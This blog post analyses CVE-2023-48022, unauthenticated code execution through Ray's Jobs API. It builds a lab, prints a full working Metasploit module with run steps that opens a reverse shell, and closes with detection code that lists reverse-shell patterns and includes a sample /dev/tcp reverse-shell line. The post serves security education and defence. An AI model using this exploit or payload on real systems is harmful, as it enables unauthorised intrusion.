Unmasking Ray's Vulnerability: A Deep Dive into CVE-2023-48022

2024-04-21

James McGill

Introduction

The world of distributed computing for machine learning (ML) was rattled in late 2023 by CVE-2023-48022, a critical vulnerability in the popular Ray framework. The flaw lets anyone who can reach a cluster's job submission API run arbitrary code on it without authenticating, which leaves exposed clusters open to remote compromise. For security researchers and system administrators alike, understanding the details of CVE-2023-48022 is crucial to fortifying Ray deployments.

Ray in the Spotlight

Ray, developed by Anyscale, is an open-source framework that empowers developers to seamlessly scale Python applications and ML workloads across clusters. Its ability to handle complex computations with ease has garnered the attention of industry giants like Uber, Amazon, and OpenAI. However, CVE-2023-48022 cast a shadow over Ray's brilliance, highlighting a security flaw that could be exploited by malicious actors.

The Anatomy of the Attack

The vulnerability stems from Ray's Jobs API, which is served on the dashboard port and accepts job submissions without authentication. Anyone who can reach the API over the network can submit a job, and Ray will execute that job's command on the underlying system.

The Vulnerability: Missing Authentication in the Jobs API

The crux of CVE-2023-48022 is the absence of authentication on the Jobs API. The CVE record names Ray 2.6.3 and 2.8.0 as affected, and this post uses 2.8.0 for its lab. An unauthenticated attacker who can reach the API can therefore submit jobs of their own and have the cluster run them.

Here's a technical breakdown of the exploit:

Crafting the Malicious Request: The attacker sends an HTTP POST request to the Jobs API endpoint (/api/jobs/ on the dashboard port). The body is a small JSON document whose entrypoint field holds the command to run.
No Credential Check: The API does not verify who sent the request. It accepts the job and schedules it like any legitimate submission, so network reachability is the only precondition.
Code Execution and Shenanigans: Ray runs the entrypoint as a shell command on the cluster. The attacker's command executes with the privileges of the user running Ray, which is enough to read data and credentials available to the cluster or to open a reverse shell.
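From a defender's point of view, a request of this kind is easy to recognize. The following is a minimal Python sketch, not part of Ray, that takes the method, path and body of an HTTP request (as they might appear in a reverse proxy log or a packet capture) and returns the job entrypoint if the request looks like a job submission. The two paths are the ones used by the Metasploit module later in this post; the function name job_entrypoint is hypothetical.

```python
import json
from typing import Optional

# Paths the Metasploit module in this post submits jobs to (trailing slash removed).
JOB_SUBMIT_PATHS = {"/api/jobs", "/api/job_agent/jobs"}


def job_entrypoint(method: str, path: str, body: str) -> Optional[str]:
    """Return the entrypoint command if this looks like a job submission, else None."""
    if method.upper() != "POST":
        return None
    # Ignore any query string and tolerate a missing or extra trailing slash.
    clean_path = path.split("?", 1)[0].rstrip("/")
    if clean_path not in JOB_SUBMIT_PATHS:
        return None
    try:
        payload = json.loads(body)
    except (TypeError, ValueError):
        # Not JSON at all, so not a job submission we can interpret.
        return None
    if not isinstance(payload, dict):
        return None
    entrypoint = payload.get("entrypoint")
    return entrypoint if isinstance(entrypoint, str) else None
```

Feeding captured requests through a helper like this gives a list of every command that was submitted as a job, which is a useful starting point when reviewing a cluster that was reachable from an untrusted network.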

Proof of Concept

First we will need to install a vulnerable version of Ray in a virtual environment to set up a lab for this PoC. We can do this by running:

pip3 install -U "ray[default]"==2.8.0
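Before going further, it can help to confirm that the virtual environment really contains the pinned version rather than a newer one pulled in by another package. The sketch below uses only the Python standard library; the helper name installed_version and the LAB_VERSION constant are illustrative names, with the value taken from the pip command above.

```python
from importlib import metadata
from typing import Optional

LAB_VERSION = "2.8.0"  # the version pinned by the pip command above


def installed_version(dist_name: str = "ray") -> Optional[str]:
    """Return the installed version of a distribution, or None if it is absent."""
    try:
        return metadata.version(dist_name)
    except metadata.PackageNotFoundError:
        return None


if __name__ == "__main__":
    found = installed_version()
    if found is None:
        print("ray is not installed in this environment")
    elif found == LAB_VERSION:
        print(f"ray {found} matches the lab version")
    else:
        print(f"ray {found} is installed, expected {LAB_VERSION}")
```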

Once Ray is installed, we can go ahead and start the server:

ray start --head --dashboard-host=0.0.0.0

We can verify that the Ray server is running by opening the dashboard on its default port, 8265, in a browser.
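The same check can be scripted. This is a minimal Python sketch that only tests whether a TCP connection to the dashboard port succeeds. The helper name port_is_open and the 127.0.0.1 address (which assumes the script runs on the lab machine itself) are assumptions, not part of Ray.

```python
import socket


def port_is_open(host: str, port: int, timeout: float = 2.0) -> bool:
    """Return True if a TCP connection to host:port succeeds within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers refused connections, timeouts and unreachable hosts.
        return False


if __name__ == "__main__":
    # 127.0.0.1 assumes the check runs on the lab machine itself.
    print("dashboard reachable:", port_is_open("127.0.0.1", 8265))
```

A successful connection only shows that something is listening on the port. It does not confirm that the listener is Ray, so the browser check remains the more informative of the two.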

We will be using a Metasploit module to exploit this vulnerability and get a reverse shell on the target system hosting the vulnerable Ray server.

Copy the following Metasploit module into a file. We are naming the file "ray_job_rce.rb":

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Ray Agent Job RCE',
      'Description'    => %q{
        RCE in Ray via the agent job submission endpoint. This is intended functionality as
        Ray's main purpose is executing arbitrary workloads.
        By default, Ray has no authentication.
      },
      'Author'         => ['sierrabearchell', 'byt3bl33d3r <marcello@protectai.com>', 'Akos Jakab'],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['URL', 'https://huntr.com/bounties/b507a6a0-c61a-4508-9101-fceb572b0385/']
        ],
      'Platform'       => 'linux',
      'Targets'        => [['Automatic', {}]],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2023-11-15',
      'DefaultOptions' => {
        'RPORT' => 8265,
        'SSL'   => false,
        'PAYLOAD' => 'linux/x64/shell/reverse_tcp'
      }
    ))
    register_options(
      [
        OptString.new('COMMAND', [false, 'The command to execute', '']),
      ])
  end
  def check
    # Simple check to see if target is reachable; consider enhancing based on app's specific
    # behavior or endpoints
    res = send_request_cgi('uri' => '/')
    return res.nil? ? CheckCode::Unknown : CheckCode::Detected
  end

  def execute_command(cmd, opts = {})
    target_uri_paths = ['/api/jobs/', '/api/job_agent/jobs/']
    target_uri_paths.each do |uri|
      begin
        res = send_request_cgi({
          'method' => 'POST',
          'uri'    => normalize_uri(uri),
          'ctype'  => 'application/json',
          'data'   => {'entrypoint' => cmd}.to_json
        })
        
        unless res
          print_error("Failed to receive response for #{uri}")
          next
        end
        
        if res.code == 200
          print_good("Command execution successful: #{cmd}")
          job_data = res.get_json_document
          print_status("Job ID: #{job_data['job_id']}, Submission ID: #{job_data['submission_id']}")
          return
        else
          print_error("Failed command execution for #{uri}: HTTP #{res.code}")
        end
      rescue ::Rex::ConnectionError => e
        print_error("Failed to connect to the server: #{e.message}")
        return
      end
    end
    fail_with(Failure::Unknown, "Command execution failed for all paths")
  end

  def exploit
    if datastore['COMMAND'].nil? || datastore['COMMAND'].empty?
      print_status('No custom command specified, executing reverse shell...')
      execute_cmdstager
    else
      print_status("Executing custom command: #{datastore['COMMAND']}")
      execute_command(datastore['COMMAND'])
    end
  end
end

Now copy it into Metasploit's exploits directory:

cp ray_job_rce.rb /usr/share/metasploit-framework/modules/exploits/multi/misc/

Let's launch the Metasploit console and reload the modules so it picks up the newly added one:

msfconsole

reload_all

Now load the exploit to perform the attack:

use exploit/multi/misc/ray_job_rce

We need to set the options required by the module before we launch the exploit. Let's set RHOST (remote host), which is our target server, and LHOST (local host), which is the attacker machine that will receive the reverse shell. Port 8265 is already set by default through RPORT.

set RHOST <TARGET_IP>

set LHOST <LOCAL_IP>

Once we have set up the options, we can finally launch the exploit and see if it is able to give us a reverse shell into the target system:

run

The Patch and the Aftermath

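Anyscale responded to the batch of Ray vulnerabilities reported in late 2023 with Ray 2.8.1. It is worth being precise about what that means for CVE-2023-48022, though: the vendor disputes this CVE, taking the position that Ray is not intended for use outside a strictly controlled network environment, and the Metasploit module above makes the same point when it notes that Ray has no authentication by default. Upgrading is still sensible, but it should not be treated as closing unauthenticated access to the Jobs API. Keeping the dashboard port unreachable from untrusted networks is the mitigation that matters.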

In March 2024, Oligo Security reported a campaign it named ShadowRay, in which attackers had been actively exploiting this vulnerability for months and had compromised numerous Ray deployments. This underlines the importance of keeping Ray off untrusted networks, staying current with security patches, and maintaining good security hygiene.
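Part of that hygiene is knowing which interface the dashboard listens on. The lab in this post deliberately starts Ray with --dashboard-host=0.0.0.0, which makes port 8265 reachable from other machines. The sketch below classifies a bind address so that a deployment script or review checklist can flag that setting. It relies only on Python's standard ipaddress module; the function name dashboard_exposure and its three labels are hypothetical.

```python
import ipaddress


def dashboard_exposure(bind_host: str) -> str:
    """Classify a dashboard bind address as 'loopback', 'all-interfaces' or 'specific'."""
    if bind_host == "localhost":
        return "loopback"
    try:
        addr = ipaddress.ip_address(bind_host)
    except ValueError:
        # A hostname we cannot classify without DNS resolution.
        return "specific"
    if addr.is_unspecified:  # 0.0.0.0 or ::
        return "all-interfaces"
    if addr.is_loopback:  # 127.0.0.0/8 or ::1
        return "loopback"
    return "specific"
```

A result of "all-interfaces" is not a problem in an isolated lab, but in any shared or cloud environment it should prompt a check of the firewall or security group rules in front of the port.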

Advanced Detection Techniques

Beyond patching and network isolation, security researchers can employ the following techniques for threat hunting and post-mortem analysis:

Log Analysis: Scrutinize Ray logs and the dashboard's job history for unexpected job submissions, particularly those originating from external sources. Look for entrypoints you do not recognize and for inconsistencies in job types or resource usage patterns.
Network Traffic Monitoring: Monitor network traffic for suspicious outgoing connections initiated by Ray processes. Connections to unexpected remote hosts can indicate a reverse shell or a payload download.
Code Analysis: Analyze the Ray codebase, particularly the components handling the Jobs API, to identify potential bypass mechanisms or lingering vulnerabilities.
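As a starting point for the job review described above, the following Python sketch flags job entrypoints that contain patterns often seen in reverse shells and download-and-run one-liners. The pattern list is an illustrative assumption, not an authoritative set of indicators, and the function name flag_entrypoints is hypothetical. The entrypoint strings can come from wherever you collect them, for example the dashboard's job list or proxy logs.

```python
import re
from typing import Iterable, List

# Illustrative indicators only; tune these for your environment.
SUSPICIOUS_PATTERNS = [
    re.compile(r"/dev/tcp/"),                        # bash network redirection
    re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),  # download piped into a shell
    re.compile(r"\bnc\b.*\s-e\b"),                   # netcat with command execution
    re.compile(r"\bbase64\b.*(-d|--decode)\b"),      # decoding an encoded payload
]


def flag_entrypoints(entrypoints: Iterable[str]) -> List[str]:
    """Return the entrypoints that match at least one suspicious pattern."""
    return [e for e in entrypoints if any(p.search(e) for p in SUSPICIOUS_PATTERNS)]


if __name__ == "__main__":
    sample = [
        "python train.py --epochs 3",
        "bash -c 'bash -i >& /dev/tcp/203.0.113.5/4444 0>&1'",
    ]
    for entry in flag_entrypoints(sample):
        print("review:", entry)
```

Pattern matching of this kind produces false positives and misses anything obfuscated, so treat a hit as a prompt for manual review rather than as proof of compromise.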

Conclusion

CVE-2023-48022 serves as a wake-up call for the security community. By understanding the technical details of this vulnerability, security researchers can develop better detection and mitigation strategies. System administrators, in turn, can use this knowledge to fortify their Ray deployments and safeguard critical ML workloads. By working together, we can create a more secure environment for distributed computing and ML.

Disclaimer

The information presented in this blog post is for educational purposes only. It is intended to raise awareness about the CVE-2023-48022 vulnerability and help mitigate the risks. It is not intended to be used for malicious purposes.

It's crucial to understand that messing around with vulnerabilities in live systems without permission is not just against the law, but it also comes with serious risks. This blog post does not support or encourage any activities that could help with such unauthorized actions.